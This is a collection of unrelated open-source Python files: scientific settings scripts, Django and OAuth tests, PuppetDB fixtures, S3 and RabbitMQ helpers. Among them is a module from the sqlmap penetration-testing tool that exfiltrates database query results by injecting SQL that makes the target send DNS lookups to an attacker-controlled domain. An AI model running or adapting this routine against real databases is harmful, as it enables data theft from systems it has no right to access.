tab.settings['Legend'] = 'f=0.6'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.7043956704831009
tab.settings['Volume fraction'] = 0.6
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[7]
tab.settings['Legend'] = 'f=0.7'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.7875384471385155
tab.settings['Volume fraction'] = 0.7
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[8]
tab.settings['Legend'] = 'f=0.8'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.8640269960076986
tab.settings['Volume fraction'] = 0.8
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[9]
tab.settings['Legend'] = 'f=0.9'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.9346294240088532
tab.settings['Volume fraction'] = 0.9000000000000001
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
tab = self.notebook.analysisTab
tab.settings['Minimum frequency'] = -1
tab.settings['Maximum frequency'] = 400
tab.settings['title'] = 'Analysis'
tab.settings['Covalent radius scaling'] = 1.1
tab.settings['Bonding tolerance'] = 0.1
tab.settings['Bar width'] = 0.5
#
#
tab = self.notebook.viewerTab
tab.settings['Atom scaling'] = 0.5
tab.settings['Maximum displacement'] = 1.0
tab.settings['Bond colour'] = [80, 80, 80, 255]
tab.settings['Bond radius'] = 0.1
tab.settings['Cell colour'] = [255, 0, 0, 255]
tab.settings['Cell radius'] = 0.1
tab.settings['Background colour'] = [120, 120, 120, 255]
tab.settings['Arrow colour'] = [0, 255, 0, 255]
tab.settings['Arrow radius'] = 0.07
tab.settings['Number of phase steps'] = 41
tab.settings['Super Cell'] = [1, 1, 1]
#
#
tab = self.notebook.fitterTab
tab.settings['Excel file name'] = ''
tab.settings['Plot title'] = 'Experimental and Calculated Spectral Comparison'
tab.settings['Fitting type'] = 'Minimise x-correlation'
tab.settings['Number of iterations'] = 20
tab.settings['Frequency scaling factor'] = 1.0
tab.settings['Optimise frequency scaling'] = False
tab.settings['Spectrum scaling'] = False
tab.settings['Spectrum scaling factor'] = 1.0
tab.settings['Independent y-axes'] = True
tab.settings['Spectral difference threshold'] = 0.05
tab.settings['HPFilter lambda'] = 7.0
tab.settings['Baseline removal'] = False
tab.settings['Scenario index'] = 0
#
#
tab = self.notebook.plottingTab
tab.settings['Minimum frequency'] = 0
tab.settings['Maximum frequency'] = 800
tab.settings['Frequency increment'] = 0.2
tab.settings['Molar definition'] = 'Unit cells'
tab.settings['Number of atoms'] = 1
tab.settings['Plot type'] = 'Powder Molar Absorption'
tab.settings['concentration'] = 86.71312720248292
tab.settings['cell concentration'] = 86.71312720248292
|
JohnKendrick/PDielec
|
Examples/Castep/MgO/application_note_bruggeman.py
|
Python
|
mit
| 12,568
|
#!/usr/bin/env python
import time, os, sys
def writetofile(filename,mysize):
mystring = "The quick brown fox jumps over the lazy dog"
writeloops = int(1000000*mysize/len(mystring))
try:
f = open(filename, 'w')
except:
print "Error writing"
raise
for x in range(0, writeloops):
f.write(mystring)
f.close()
os.remove(filename)
##############
def diskspeedmeasure(fileordirname):
filename = 'outputTESTING.txt' # default filename
filesize = 1 # in MB
maxtime = 0.5 # in sec
if os.path.isdir(fileordirname):
filename = os.path.join(fileordirname,filename)
elif os.path.isfile(fileordirname):
filename = fileordirname
else:
filename = fileordirname
start = time.time()
loopcounter = 0
while True:
try:
writetofile(filename, filesize)
except:
print "EERRRROOROROR ... bailing out"
sys.exit(0)
loopcounter += 1
#now = time.time()
diff = time.time() - start
if diff > maxtime: break
return (loopcounter*filesize)/diff
############## Start of main
if __name__ == "__main__":
print "Let's go"
filename = 'outputTESTING.txt' # default filename
if len(sys.argv) >= 2:
arg1 = sys.argv[1]
if os.path.isdir(arg1):
filename = os.path.join(arg1,filename)
elif os.path.isfile(arg1):
filename = arg1
else:
print "Specified argument is not a filename nor a directory. Bailing out"
sys.exit(1)
print "filename", filename
print "Disk writing speed:", diskspeedmeasure(filename), "Mbytes per second"
print "Done"
|
sanderjo/disk-speed
|
diskspeed-dir-or-file-name.py
|
Python
|
gpl-3.0
| 1,485
|
"""Fine-tune the estimated chip rate of a positioning signal."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import numpy as np
import scipy
from thrifty.carrier_sync import DefaultSynchronizer
from thrifty.soa_estimator import SoaEstimator
from thrifty.block_data import card_reader
from thrifty.setting_parsers import metric_float
from thrifty import template_generate
def search(fft, initial_chip_rate, bit_length, code_index, sample_rate):
"""Find chip rate that yields the maximum correlation peak when being
correlated with the ideal Gold code template."""
def _objective(params):
chip_rate = params[0]
sps = sample_rate / chip_rate
detected, corr_info = _match(fft, sps, bit_length, code_index)
if not detected:
ampl = 0
else:
ampl = -corr_info.energy
print(".. try chip rate {} -> {}".format(chip_rate, -ampl))
return ampl
res = scipy.optimize.minimize(_objective, initial_chip_rate,
method='Nelder-Mead',
options={'xtol': 100, 'disp': True})
return res.x[0]
def _match(fft, sps, bit_length, code_index):
template = template_generate.generate(
bit_length, code_index, sps)
block_history = len(template) - 1
soa_estimate = SoaEstimator(template=template,
thresh_coeffs=(0, 0, 0),
block_len=len(fft),
history_len=block_history)
detected, corr_info, _ = soa_estimate(fft)
return detected, corr_info
def _find_block(blocks, block_id):
for _, block_idx, block in blocks:
if block_idx == block_id:
return block
raise Exception("Could not find block with index {}".format(block_id))
def _plot(fft, chip_rate, bit_length, code_index, sample_rate):
import matplotlib.pyplot as plt
sps = sample_rate / chip_rate
template = template_generate.generate(bit_length, code_index, sps)
detected, corr_info = _match(fft, sps, bit_length, code_index)
assert detected
signal = np.fft.ifft(fft)
start = corr_info.sample
plt.plot(np.abs(signal[start:start+len(template)]))
scaled_template = (template + 1) / 2 * np.max(np.abs(signal)) * 0.9
plt.plot(np.arange(len(template))+corr_info.offset, scaled_template)
plt.savefig('chip_rate_search.pdf', format='pdf')
plt.show()
def _main():
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('card_file',
type=argparse.FileType('rb'), default='-',
help="card file with positioning signal to match "
"against.")
parser.add_argument('block_id', type=int,
help="Block within the card file that contains the"
"positioning signal to match against.")
parser.add_argument('sample_rate', type=metric_float,
help="Sample rate that was used to capture the data.")
parser.add_argument('chip_rate', type=metric_float,
help="Estimated chip rate.")
parser.add_argument('bit_length', type=int,
help="Register length of gold code to generate and "
"match.")
parser.add_argument('code_index', nargs='?', type=int, default=0,
help="Index of code within the set of Gold codes of "
"equal length.")
parser.add_argument('-p', '--plot', action="store_true",
help="Plot best fit.")
args = parser.parse_args()
blocks = card_reader(args.card_file)
block = _find_block(blocks, args.block_id)
# Synchronize to carrier. It is assumed that a strong carrier is present.
sps = args.sample_rate / args.chip_rate
carrier_len = int((2**args.bit_length - 1) * sps)
sync = DefaultSynchronizer(thresh_coeffs=(100, 0, 0),
window=None,
block_len=len(block),
carrier_len=carrier_len)
shifted_fft, _ = sync(block)
assert shifted_fft is not None
best = search(fft=shifted_fft,
initial_chip_rate=args.chip_rate,
bit_length=args.bit_length,
code_index=args.code_index,
sample_rate=args.sample_rate)
print("Best chip rate: {}".format(best))
if args.plot:
_plot(shifted_fft, best, args.bit_length,
args.code_index, args.sample_rate)
if __name__ == '__main__':
_main()
|
swkrueger/Thrifty
|
scripts/chip_rate_search.py
|
Python
|
gpl-3.0
| 4,845
|
# -*- coding:utf-8 -*-
import sys
sys.path.append("../luna-data-pre-processing")
import os
from glob import glob
import numpy as np
from math import sqrt
from functools import reduce
from skimage import feature, exposure
import SimpleITK as sitk
from tqdm import tqdm
from NoduleSerializer import NoduleSerializer
import blobs_detection
import plot
# TODO : filter notations with Resnet output
class Notate(object):
# constuctor
def __init__(self, dataPath, phase = "deploy", stepSize = 32):
self.dataPath = dataPath
self.phase = phase # test or deploy
self.phaseSubPath = self.phase + "/"
self.stepSize = stepSize
self.serializer = NoduleSerializer(self.dataPath, self.phase)
self.sqrt3 = sqrt(3.0)
# helper
def calcWorldCoord(self, notations, origin):
position = np.array([notations[0], notations[1], notations[2]]) # z, y, x
worldCoord = origin + position
notations[0] = worldCoord[0]
notations[1] = worldCoord[1]
notations[2] = worldCoord[2]
return notations
def calcRadius(self, blob):
# blob is 4D ndarray for 3D image
notation = blob
notation[3] = self.sqrt3 * notation[3]
return notation
# interface
def notate(self):
csvPath = self.dataPath + self.phaseSubPath + "csv/"
if not os.path.isdir(csvPath):
os.makedirs(csvPath)
with open(csvPath + "annotation.csv", "w") as file:
file.write("seriesuid,coordX,coordY,coordZ,diameter_mm\n")
with open(csvPath + "seriesuids.csv", "w") as file:
file.write("seriesuid\n")
pathList = glob(self.dataPath + self.phaseSubPath + "concat/*.npy")
for path in enumerate(tqdm(pathList)):
filename = os.path.basename(path[1])
seriesuid = filename.split(".")[0]
print(seriesuid)
data = self.serializer.readFromNpy("concat/", filename)
data = np.squeeze(data)
# notation filter with lung mask
mask = self.serializer.readFromNpy("mask/", filename)
data = data * mask
# blob dectection
data = exposure.equalize_hist(data)
blobs = blobs_detection.blob_dog(data, threshold=0.3, min_sigma=self.sqrt3)
# blobs = feature.blob_dog(data, threshold = 0.3)
# blobs = feature.blob_log(data)
# blobs = feature.blob_doh(data)
# get radius of blobs - now we have notation
notations = np.zeros(blobs.shape)
for i in range(len(blobs)):
notations[i] = self.calcRadius(blobs[i])
print(notations)
print(len(notations))
# convert to world coord
mhdFile = os.path.join(self.dataPath, self.phaseSubPath, "raw/", seriesuid + ".mhd")
rawImage = sitk.ReadImage(mhdFile)
worldOrigin = np.array(rawImage.GetOrigin())[::-1]
for i in range(len(notations)):
notations[i] = self.calcWorldCoord(notations[i], worldOrigin)
# write notations to csv
csvPath = self.dataPath + self.phaseSubPath + "csv/"
if not os.path.isdir(csvPath):
os.makedirs(csvPath)
with open(csvPath + "annotation.csv", "w+") as file:
file.write("seriesuid,coordX,coordY,coordZ,diameter_mm\n")
for i in range(len(notations)):
line = "{0},{1},{2},{3},{4}\n".format(seriesuid, notations[i][2], notations[i][1], notations[i][0], notations[i][3] * 2.0)
file.write(line)
with open(csvPath + "seriesuids.csv", "w+") as file:
file.write("seriesuid")
for i in range(len(notations)):
file.write(seriesuid)
if __name__ == "__main__":
notater = Notate("d:/project/tianchi/data/experiment/", "deploy")
notater.notate()
|
xiedidan/luna-network
|
resnext/filter.py
|
Python
|
gpl-3.0
| 3,970
|
import json
from .oauth import OAuth2Test
class OrbiOAuth2Test(OAuth2Test):
backend_path = 'social_core.backends.orbi.OrbiOAuth2'
user_data_url = 'https://login.orbi.kr/oauth/user/get'
expected_username = 'foobar'
access_token_body = json.dumps({
'access_token': 'foobar',
})
user_data_body = json.dumps({
'username': 'foobar',
'first_name': 'Foo',
'last_name': 'Bar',
'name': 'Foo Bar',
'imin': '100000',
'nick': 'foobar',
'photo': 'http://s3.orbi.kr/data/member/wi/wizetdev_132894975780.jpeg',
'sex': 'M',
'birth': '1973-08-03',
})
def test_login(self):
self.do_login()
def test_partial_pipeline(self):
self.do_partial_pipeline()
|
tobias47n9e/social-core
|
social_core/tests/backends/test_orbi.py
|
Python
|
bsd-3-clause
| 770
|
from django.test import TestCase
from django.urls import reverse
from django.core import mail
from django.contrib.auth.models import User
from securedpi_locks.models import Lock
class RegistrationTestCase(TestCase):
"""Setup Registration test case."""
def setUp(self):
"""Set up for registration test case."""
self.url = reverse('registration_register')
self.get_response = self.client.get(self.url)
self.post_response = self.client.post(
self.url,
{
'username': 'user1',
'email': 'user1@gmail.com',
'password1': 'user1passwordsecret',
'password2': 'user1passwordsecret'
})
def test_access_for_unauth_users_ok(self):
"""Prove that unauth users can access the registration page."""
self.assertEqual(self.get_response.status_code, 200)
def test_registration_page_uses_right_template(self):
"""Assert that registration page is rendered with right template."""
template = 'registration/registration_form.html'
self.assertTemplateUsed(self.get_response, template)
def test_redirect_after_registred(self):
"""Test redirection from the page on successful registration."""
self.assertEqual(self.post_response.status_code, 302)
def test_correct_url_on_redirect_after_registred(self):
"""Test redirecte url upon successful registration."""
self.assertEqual(
self.post_response.url,
reverse('registration_complete'))
class EmailTest(TestCase):
"""Set up Email Test Class."""
def test_send_email(self):
"""Tests that registration email was sent."""
mail.send_mail(
"Registration details", "This is the registration message.",
'user@djangoimager.com', ['s@s.com', 'd@s.com'],
fail_silently=False,
)
# Tests that an email was sent
self.assertEqual(len(mail.outbox), 1)
# Verify the subject of the first message is as expected
self.assertEqual(mail.outbox[0].subject, "Registration details")
# Verify the message of the email is as expected
self.assertEqual(
mail.outbox[0].message()._payload,
"This is the registration message.")
# Verify the recipients are as expected
self.assertEqual(mail.outbox[0].to, ['s@s.com', 'd@s.com'])
# Verify the sender is as expected
self.assertEqual(mail.outbox[0].from_email, "user@djangoimager.com")
class LoginPageTestCase(TestCase):
"""Define clas for login page testing."""
def setUp(self):
"""Set up for testing."""
self.url = reverse('auth_login')
self.response = self.client.get(self.url)
def test_access_for_unauth_users(self):
"""Make sure unauth users have access to Login page."""
self.assertEqual(self.response.status_code, 200)
def test_for_registration_button(self):
"""Prove login page contains registration page link."""
reg_url = reverse("registration_register")
expected = 'href="{}"'.format(reg_url)
self.assertContains(self.response, expected)
def test_fields_of_login_form(self):
"""Test that <username> and <password> fields are present."""
username_filed = 'input type="text" name="username"'
pass_field = 'input type="password" name="password"'
login_button = "Login"
expected = [username_filed, pass_field]
for field in expected:
self.assertContains(self.response, field)
class LoginLogoutTestCase(TestCase):
"""Define test case for Login/Logout functionality."""
def setUp(self):
"""Set up response for login tests."""
self.user = User(username='test')
self.user.set_password('testpassword&#')
self.user.save()
self.dashboard_url = reverse('dashboard')
self.login_url = reverse('auth_login')
self.logout_url = reverse('auth_logout')
self.bad_login_response = self.client.post(
self.login_url,
{"username": 'wrong', "password": "wrongpassword"}
)
self.login_response = self.client.post(
self.login_url,
{"username": 'test', "password": "testpassword&#"}
)
self.login_response_follow = self.client.post(
self.login_url,
{"username": 'test', "password": "testpassword&#"},
follow=True
)
self.logout_response = self.client.get(self.logout_url)
def test_redirection_after_logged_in(self):
"""Test successful login redirection."""
self.assertEqual(self.login_response.status_code, 302)
def test_redirected_to_dashboard_after_logged_in(self):
"""Prove redirection to the home page after loggin in."""
self.assertEqual(self.login_response.url, self.dashboard_url)
def test_not_redirected_when_failed_login(self):
"""Prove that the user is not redirected if wrong credentials."""
self.assertEqual(self.bad_login_response.status_code, 200)
def test_logout_succesful_redirection(self):
"""Test successful logout redirection."""
self.assertEqual(self.logout_response.status_code, 302)
def test_redirected_to_dashboard_after_logged_out(self):
"""Prove redirection to the home page after loggin out."""
self.assertEqual(self.logout_response.url, self.dashboard_url)
class DashboardViewTestCase(TestCase):
"""Define test class for Dashboard view."""
def setUp(self):
"""Define setup for tests."""
self.user = User(username='test')
self.user.save()
self.client.force_login(user=self.user)
self.lock1 = Lock(
user=self.user,
name='lock1',
location='codefellows',
serial='pi12345')
self.lock1.save()
self.lock2 = Lock(
user=self.user,
name='lock2',
location='codefellows',
serial='pi1234512345')
self.lock2.save()
self.expected1 = 'href="{}"'.format(
reverse('manual_lock', kwargs={'pk': self.lock1.pk, 'action': 'lock'}))
self.expected2 = 'href="{}"'.format(
reverse('manual_unlock', kwargs={'pk': self.lock1.pk, 'action': 'unlock'}))
self.url = reverse('dashboard')
self.response = self.client.get(self.url)
self.template = 'securedpi/dashboard.html'
def test_auth_user_has_access_to_dashboard(self):
"""Prove that response code is 200 for auth users."""
self.assertEquals(self.response.status_code, 200)
def test_right_template_is_used(self):
"""Prove that right template is used to render page."""
self.assertTemplateUsed(self.response, self.template)
def test_locks_in_context(self):
"""Prove that 'locks' are in response context."""
self.assertIn('locks', self.response.context)
def test_correct_number_of_locks_on_dashboard(self):
"""Prove that correct number of locks renders on the dashboard."""
self.assertEqual(self.response.context['locks'].count(), 2)
def test_username_displayed(self):
"""Make sure correct username is displayed."""
self.assertContains(self.response, 'test')
def test_expected_links_displayed(self):
"""Test thatexpected links and username are displayed."""
urls = [
'profile',
'securedpi_facerec:train',
'auth_logout',
]
for url in urls:
expected_link = 'href="{}"'.format(reverse(url))
self.assertContains(self.response, expected_link)
def test_lock_buttons_present(self):
"""Make sure each lock has <Edit> and <Access Log> buttons present."""
lock_pks = [self.lock1.pk, self.lock2.pk]
for lock_pk in lock_pks:
edit_link = 'href="{}"'.format(reverse('edit_lock', kwargs={'pk': lock_pk}))
log_link = 'href="{}"'.format(reverse('events', kwargs={'pk': lock_pk}))
self.assertContains(self.response, edit_link)
self.assertContains(self.response, log_link)
def test_lock_info_present(self):
"""Make sure all lock have their info displayed."""
locks = [self.lock1, self.lock2]
for lock in locks:
info = [
lock.name,
lock.pk,
lock.serial,
lock.location,
lock.facial_recognition
]
for item in info:
self.assertContains(self.response, item)
def test_buttons_display_if_unlocked(self):
"""
Make sure <Lock> button shows up and <Unlock> doesn't
if the lock.status == 'unlocked'."""
self.lock1.status = 'unlocked'
self.lock1.is_active = True
self.lock1.save()
response = self.client.get(self.url)
self.assertContains(response, 'UNLOCKED')
self.assertContains(response, self.expected1)
self.assertNotContains(response, self.expected2)
def test_buttons_display_if_locked(self):
"""
Make sure <Unlock> button shows up and <Lock> doesn't
if the lock.status == 'locked'."""
self.lock1.status = 'locked'
self.lock1.is_active = True
self.lock1.save()
response = self.client.get(self.url)
self.assertContains(response, 'LOCKED')
self.assertNotContains(response, self.expected1)
self.assertContains(response, self.expected2)
def test_buttons_display_if_pending(self):
"""
Make sure both <Unlock> and <Lock> buttons show up
if the lock.status == 'pending'."""
self.lock1.status = 'pending'
self.lock1.is_active = True
self.lock1.save()
response = self.client.get(self.url)
self.assertContains(response, 'PENDING')
self.assertContains(response, self.expected1)
self.assertContains(response, self.expected2)
def test_buttons_display_if_not_active(self):
"""
Make sure <Unlock> and <Lock> buttons don't show up
if the lock.is_active == False."""
self.lock1.is_active = False
self.lock1.save()
response = self.client.get(self.url)
self.assertContains(response, 'NOT ACTIVE')
self.assertNotContains(response, self.expected1)
self.assertNotContains(response, self.expected2)
|
Secured-Pi/Secured-Pi
|
securedpi/test.py
|
Python
|
mit
| 10,525
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Arcus, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""v4_fixtures.py: These are fixture functions for returning PuppetDB data."""
__author__ = "monkee"
__version__ = "1.0.1"
__maintainer__ = "monk-ee"
__email__ = "magic.monkee.magic@gmail.com"
__status__ = "Development"
def v4():
return {
'/nodes': [
{
'name': 'host1',
'deactivated': None,
'catalog_timestamp': '2013-02-09T21:05:15.663Z',
'facts_timestamp': '2013-02-09T21:05:15.663Z',
'report_timestamp': None
},
{
'name': 'host2',
'deactivated': None,
'catalog_timestamp': '2013-02-09T21:05:15.663Z',
'facts_timestamp': '2013-02-09T21:05:15.663Z',
'report_timestamp': None
}
],
'/nodes/host1': {
'name': 'host1',
'deactivated': None,
'catalog_timestamp': '2013-02-09T21:05:15.663Z',
'facts_timestamp': '2013-02-09T21:05:15.663Z',
'report_timestamp': None
},
'/nodes/host1/facts': [
{
'certname': 'host1',
'name': 'architecture',
'value': 'amd64',
},
{
'certname': 'host1',
'name': 'domain',
'value': 'local',
},
{
'certname': 'host1',
'name': 'ipaddress',
'value': '1.2.3.4',
}
],
'/nodes/host1/facts/architecture': [
{
'certname': 'host1',
'name': 'architecture',
'value': 'amd64',
}
],
'/nodes/host1/resources': [
{
'certname': 'host1',
'parameters': {
'ensure': 'installed',
},
'type': 'Class',
'sourceline': 7,
'sourcefile': '/etc/foo/bar.pp',
'exported': False,
'resource': '1234567890',
},
],
'/nodes/host1/resources/Class': [
{
'certname': 'host1',
'parameters': {
'ensure': 'installed',
},
'type': 'Class',
'sourceline': 7,
'sourcefile': '/etc/foo/bar.pp',
'exported': False,
'resource': '1234567890',
},
],
'/facts': [
{
'certname': 'host1',
'name': 'puppetversion',
'value': '3.2.2',
},
{
'certname': 'host2',
'name': 'puppetversion',
'value': '2.7.10',
}
],
'/facts/ipaddress': [
{
'certname': 'host1',
'name': 'ipaddress',
'value': '10.10.10.11',
},
{
'certname': 'host2',
'name': 'ipaddress',
'value': '10.10.10.12',
}
],
'/facts/kernelversion/3.2.34': [
{
'certname': 'host1',
'name': 'kernelversion',
'value': '3.2.34',
}
],
}
|
monk-ee/puppetdb-python
|
tests/v4_fixtures.py
|
Python
|
mit
| 4,496
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
import time
from extra.safe2bin.safe2bin import safecharencode
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToStdout
from lib.core.common import decodeHexValue
from lib.core.common import extractRegexResult
from lib.core.common import getSQLSnippet
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import safeStringFormat
from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.settings import DNS_BOUNDARIES_ALPHABET
from lib.core.settings import MAX_DNS_LABEL
from lib.core.settings import PARTIAL_VALUE_MARKER
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
def dnsUse(payload, expression):
"""
Retrieve the output of a SQL query taking advantage of the DNS
resolution mechanism by making request back to attacker's machine.
"""
start = time.time()
retVal = None
count = 0
offset = 1
if conf.dnsName and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):
output = hashDBRetrieve(expression, checkConf=True)
if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:
output = None
if output is None:
kb.dnsMode = True
while True:
count += 1
prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2))
chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2
_, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
nulledCastedField = agent.hexConvertField(nulledCastedField)
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsName)
expressionUnescaped = unescaper.escape(expressionRequest)
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
query = agent.prefixQuery("; %s" % expressionUnescaped)
query = agent.suffixQuery(query)
forgedPayload = agent.payload(newValue=query)
else:
forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)
_ = conf.dnsServer.pop(prefix, suffix)
if _:
_ = extractRegexResult("%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I)
_ = decodeHexValue(_)
output = (output or "") + _
offset += len(_)
if len(_) < chunk_length:
break
else:
break
kb.dnsMode = False
if output is not None:
retVal = output
if kb.dnsTest is not None:
dataToStdout("[%s] [INFO] %s: %s\r\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
if count > 0:
hashDBWrite(expression, output)
if not kb.bruteMode:
debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start))
logger.debug(debugMsg)
elif conf.dnsName:
warnMsg = "DNS data exfiltration method through SQL injection "
warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms()
singleTimeWarnMessage(warnMsg)
return safecharencode(retVal) if kb.safeCharEncode else retVal
|
golismero/golismero
|
tools/sqlmap/lib/techniques/dns/use.py
|
Python
|
gpl-2.0
| 4,536
|
from boto.s3.connection import S3Connection as Connection
from tornado.options import options
def S3Connection():
kwargs = {}
if options.aws_port and options.aws_host:
kwargs['host'] = options.aws_host
kwargs['port'] = options.aws_port
# if we're using a custom AWS host/port, disable
# SSL, since fakes3 doesn't support it
kwargs['is_secure'] = False
return Connection(
options.aws_key,
options.aws_secret,
**kwargs)
def S3Bucket():
# if we're testing, then just auto-create a bucket if it doesn't exist already
if options.aws_bucket.endswith("-dev") or options.aws_bucket.endswith("-testing"):
return S3Connection().create_bucket(options.aws_bucket)
else:
return S3Connection().get_bucket(options.aws_bucket)
|
spaceninja/mltshp
|
lib/s3.py
|
Python
|
mpl-2.0
| 820
|
Import("projenv")
import subprocess
version = "git-cmd-not-available"
try:
version = subprocess.check_output(["git", "describe"]).strip()
except:
pass
projenv.Append(CCFLAGS=["-DKBOX_VERSION=\"\\\"{}\\\"\"".format(version)])
|
sarfata/kbox-firmware
|
tools/platformio_cfg_gitversion.py
|
Python
|
gpl-3.0
| 236
|
#!/usr/bin/env python
import pika
import sys
credentials = pika.PlainCredentials('admin', 'admin')
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='localhost',
port=5672,
virtual_host='/',
credentials=credentials))
channel = connection.channel()
channel.exchange_declare(exchange='my_exchange',
exchange_type='fanout',
durable=True)
message = ' '.join(sys.argv[1:]) or "Tchêlinux"
channel.basic_publish(exchange='my_exchange',
routing_key='',
body=message)
print(" [x] Sent %r" % message)
connection.close()
|
joelmir/tornado-simple-api
|
publisher.py
|
Python
|
mit
| 643
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Spaghetti: Web Application Security Scanner
#
